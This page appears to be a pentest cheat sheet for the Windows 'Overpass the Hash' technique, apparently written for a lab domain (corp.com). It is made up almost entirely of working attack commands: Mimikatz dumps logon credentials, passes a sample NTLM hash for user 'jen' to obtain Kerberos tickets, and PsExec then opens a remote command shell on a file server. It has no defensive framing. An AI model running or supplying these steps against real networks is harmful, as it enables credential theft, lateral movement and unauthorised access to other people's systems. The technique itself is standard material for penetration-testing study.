Overpass The Hash
Mimikatz
privilege::debug
sekurlsa::logonpasswordsNeed username and NTLM hashes
sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershellUse klist to list cached Kerberos tickets
klistTry authenticate to any fileshare
net use \\files04Check klist again
klistWe can now use psexec.exe to authenticate
.\PsExec.exe \\files04 cmdLast updated
Was this helpful?